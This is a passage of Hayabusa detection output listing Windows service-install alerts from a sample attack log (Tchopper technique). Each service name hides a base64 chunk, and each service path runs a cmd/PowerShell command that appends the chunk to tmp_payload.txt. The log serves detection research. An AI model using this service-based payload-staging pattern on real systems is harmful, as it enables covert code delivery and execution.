Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 